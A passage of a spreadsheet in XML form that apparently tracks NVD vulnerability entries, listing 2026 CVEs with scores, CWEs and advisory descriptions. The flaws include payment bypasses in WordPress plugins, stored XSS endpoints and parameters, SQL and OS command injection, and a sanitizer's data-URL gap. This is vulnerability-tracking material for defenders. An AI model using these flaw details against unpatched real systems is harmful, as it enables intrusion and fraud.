        <v>5.3</v>
      </c>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="inlineStr"/>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr"/>
      <c r="K259" s="5" t="inlineStr"/>
      <c r="L259" s="5" t="inlineStr"/>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q259" s="5" t="inlineStr"/>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>CWE-923</t>
        </is>
      </c>
      <c r="S259" s="5" t="inlineStr">
        <is>
          <t>mH-DEVELOPER smart home module does not load any firewall rules at startup. This leaves all listening services, including SSH, HTTP, WebSocket, and Node-RED, fully exposed on the LAN without access control. Any client on the same network can reach every service.
This issue was fixed in version 3.0.30</t>
        </is>
      </c>
      <c r="T259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82932</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86838</t>
        </is>
      </c>
      <c r="D260" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="inlineStr"/>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K260" s="5" t="inlineStr"/>
      <c r="L260" s="5" t="inlineStr"/>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q260" s="5" t="inlineStr"/>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>CWE-472</t>
        </is>
      </c>
      <c r="S260" s="5" t="inlineStr">
        <is>
          <t>The Bookly WordPress plugin before 28.3 does not validate client-supplied booking quantity values on the server before computing the appointment total, allowing unauthenticated users to reduce the total to zero and book paid services for free while bypassing the payment step.</t>
        </is>
      </c>
      <c r="T260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86838</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89300</t>
        </is>
      </c>
      <c r="D261" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="inlineStr"/>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K261" s="5" t="inlineStr"/>
      <c r="L261" s="5" t="inlineStr"/>
      <c r="M261" s="5" t="inlineStr"/>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q261" s="5" t="inlineStr"/>
      <c r="R261" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S261" s="5" t="inlineStr">
        <is>
          <t>The WP Verify API WordPress plugin through 1.0.0 does not have any authorisation check in one of its REST routes, allowing unauthenticated users to insert arbitrary data into its own database table, as well as to make the site send templated verification emails to arbitrary email addresses. The route is not rate limited either.</t>
        </is>
      </c>
      <c r="T261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89300</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89411</t>
        </is>
      </c>
      <c r="D262" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="inlineStr"/>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K262" s="5" t="inlineStr"/>
      <c r="L262" s="5" t="inlineStr"/>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q262" s="5" t="inlineStr"/>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S262" s="5" t="inlineStr">
        <is>
          <t>The Paymattic WordPress plugin from 4.6.20 before 4.6.26 does not verify that a confirmed Stripe payment belongs to the order it is applied to, allowing unauthenticated users to mark an arbitrary pending order as paid by confirming a smaller payment of their own against it.</t>
        </is>
      </c>
      <c r="T262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89411</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92996</t>
        </is>
      </c>
      <c r="D263" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E263" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F263" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="inlineStr"/>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K263" s="5" t="inlineStr"/>
      <c r="L263" s="5" t="inlineStr"/>
      <c r="M263" s="5" t="inlineStr"/>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q263" s="5" t="inlineStr"/>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S263" s="5" t="inlineStr">
        <is>
          <t>The Verge3D WordPress plugin from 4.1.0 through 4.13.0 does not verify with the payment provider that a payment was actually made, and does not check order ownership, allowing unauthenticated users to mark any order as paid.</t>
        </is>
      </c>
      <c r="T263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92996</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73641</t>
        </is>
      </c>
      <c r="D264" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E264" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F264" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="inlineStr"/>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr"/>
      <c r="K264" s="5" t="inlineStr"/>
      <c r="L264" s="5" t="inlineStr"/>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P264" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q264" s="5" t="inlineStr"/>
      <c r="R264" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S264" s="5" t="inlineStr">
        <is>
          <t>Dayforce Payroll is vulnerable to Reflected XSS in multiple endpoints. An attacker can prepare a specially crafted URL that, when opened, results in arbitrary JavaScript execution in the victim's browser.
Because vendor contact attempts were unsuccessful, the vulnerability has only been confirmed in version R2026.2.0 but may also affect other versions.</t>
        </is>
      </c>
      <c r="T264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73641</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80358</t>
        </is>
      </c>
      <c r="D265" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E265" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F265" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="inlineStr"/>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr">
        <is>
          <t>dell</t>
        </is>
      </c>
      <c r="K265" s="5" t="inlineStr"/>
      <c r="L265" s="5" t="inlineStr"/>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q265" s="5" t="inlineStr"/>
      <c r="R265" s="5" t="inlineStr">
        <is>
          <t>CWE-1191</t>
        </is>
      </c>
      <c r="S265" s="5" t="inlineStr">
        <is>
          <t>Dell Boot Optimized Server Storage (BOSS), versions prior to 2.2.13.2038, contains an On-Chip Debug and Test Interface With Improper Access Control vulnerability in the SMCU on 17G BOSS-N1 controllers. An unauthenticated attacker with physical access could potentially exploit this vulnerability, leading to Unauthorized access.</t>
        </is>
      </c>
      <c r="T265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80358</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94285</t>
        </is>
      </c>
      <c r="D266" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E266" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F266" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="inlineStr"/>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr"/>
      <c r="K266" s="5" t="inlineStr"/>
      <c r="L266" s="5" t="inlineStr"/>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q266" s="5" t="inlineStr"/>
      <c r="R266" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S266" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read in libX11's byte-oriented codeset parser in libX11 before 1.8.14 could be used by malicious X servers to crash attached X clients.</t>
        </is>
      </c>
      <c r="T266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94285</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102269</t>
        </is>
      </c>
      <c r="D267" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E267" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F267" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="inlineStr"/>
      <c r="I267" s="5" t="inlineStr"/>
      <c r="J267" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K267" s="5" t="inlineStr"/>
      <c r="L267" s="5" t="inlineStr"/>
      <c r="M267" s="5" t="inlineStr"/>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q267" s="5" t="inlineStr"/>
      <c r="R267" s="5" t="inlineStr">
        <is>
          <t>CWE-180</t>
        </is>
      </c>
      <c r="S267" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, PyJWT signature segment is affected because signature segment decoding accepts characters outside the canonical Base64URL representation. This occurs when non-Base64URL characters are appended to a valid compact JWS signature segment. As a result, base64url_decode produces the same signature bytes for different serialized segments. Consequently, raw-token revocation checks can fail to recognize an equivalent modified token. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102269</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7170</t>
        </is>
      </c>
      <c r="D268" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E268" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F268" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="inlineStr"/>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K268" s="5" t="inlineStr"/>
      <c r="L268" s="5" t="inlineStr"/>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q268" s="5" t="inlineStr"/>
      <c r="R268" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S268" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) in TPVEnlanube affecting the following endpoint and parameter:
  *  CVE-2026-7170: parameter 'vendor_store_name' in the endpoint  '/administrator/index.php?pshop_mode=admin&amp;page=store.store_add&amp;option=com_virtuemart&amp;vendor_id=[ID]'.
Successful exploitation of this vulnerability could allow an authenticated attacker to inject malicious code and execute it in users' browsers without their consent.</t>
        </is>
      </c>
      <c r="T268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7170</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7171</t>
        </is>
      </c>
      <c r="D269" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E269" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F269" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="inlineStr"/>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K269" s="5" t="inlineStr"/>
      <c r="L269" s="5" t="inlineStr"/>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P269" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q269" s="5" t="inlineStr"/>
      <c r="R269" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S269" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) in TPVEnlanube affecting the following endpoint and parameter:
  *  CVE-2026-7171: parameter 'Apellido 1' in the endpoint  '/administrator/index.php?page=admin.user_add&amp;user_id=45&amp;option=com_virtuemart'.
Successful exploitation of this vulnerability could allow an authenticated attacker to inject malicious code and execute it in users' browsers without their consent.</t>
        </is>
      </c>
      <c r="T269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7171</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7172</t>
        </is>
      </c>
      <c r="D270" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E270" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F270" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="inlineStr"/>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K270" s="5" t="inlineStr"/>
      <c r="L270" s="5" t="inlineStr"/>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q270" s="5" t="inlineStr"/>
      <c r="R270" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S270" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) in TPVEnlanube affecting the following endpoint and parameter:
  *  CVE-2026-7172: parameter 'Nombre Completo' in the endpoint  '/administrator/index.php?option=com_virtuemart&amp;page=admin.user_list'.
Successful exploitation of this vulnerability could allow an authenticated attacker to inject malicious code and execute it in users' browsers without their consent.</t>
        </is>
      </c>
      <c r="T270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7172</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100370</t>
        </is>
      </c>
      <c r="D271" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E271" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F271" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="inlineStr"/>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K271" s="5" t="inlineStr"/>
      <c r="L271" s="5" t="inlineStr"/>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q271" s="5" t="inlineStr"/>
      <c r="R271" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S271" s="5" t="inlineStr">
        <is>
          <t>DOMSanitizer is a DOM/SVG/MathML Sanitizer for PHP 7.3+. Prior to version 1.0.15, the isDangerousUrl() method is responsible for rejecting dangerous URL values in the href and xlink:href attributes. The weakness is that "javascript:" is rejected as a scheme, while "data:" is rejected only when the literal substring onload appears in the URL value (/^data:.*onload/i). Because data: payloads are routinely Base64-encoded, the dangerous content (&lt;script&gt;, event handlers, etc.) is invisible to that substring test. A URL such as data:text/html;base64,… therefore survives in href / xlink:href, even though the decoded payload is active markup. This is an incomplete input-validation / sanitization defect in the sanitizer itself. This issue has been patched in version 1.0.15.</t>
        </is>
      </c>
      <c r="T271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100370</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101018</t>
        </is>
      </c>
      <c r="D272" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E272" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="inlineStr"/>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K272" s="5" t="inlineStr"/>
      <c r="L272" s="5" t="inlineStr"/>
      <c r="M272" s="5" t="inlineStr"/>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q272" s="5" t="inlineStr"/>
      <c r="R272" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S272" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in dayrui XunruiCMS up to 4.7.2. This issue affects the function group_all_edit of the file dayrui/App/Member/Controllers/Admin/Home.php of the component Group Editing. This manipulation of the argument groupid causes sql injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101018</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101858</t>
        </is>
      </c>
      <c r="D273" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E273" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="inlineStr"/>
      <c r="I273" s="5" t="inlineStr"/>
      <c r="J273" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K273" s="5" t="inlineStr"/>
      <c r="L273" s="5" t="inlineStr"/>
      <c r="M273" s="5" t="inlineStr"/>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q273" s="5" t="inlineStr"/>
      <c r="R273" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S273" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in RaspAP raspap-webgui up to 3.5.5. Affected is the function WiFiManager::writeWpaSupplicant of the file src/RaspAP/Networking/Hotspot/WiFiManager.php of the component SSID Processing. This manipulation of the argument ssid causes os command injection. The attack can be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101858</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102263</t>
        </is>
      </c>
      <c r="D274" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E274" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="inlineStr"/>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K274" s="5" t="inlineStr"/>
      <c r="L274" s="5" t="inlineStr"/>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q274" s="5" t="inlineStr"/>
      <c r="R274" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-434</t>
        </is>
      </c>
      <c r="S274" s="5" t="inlineStr">
        <is>
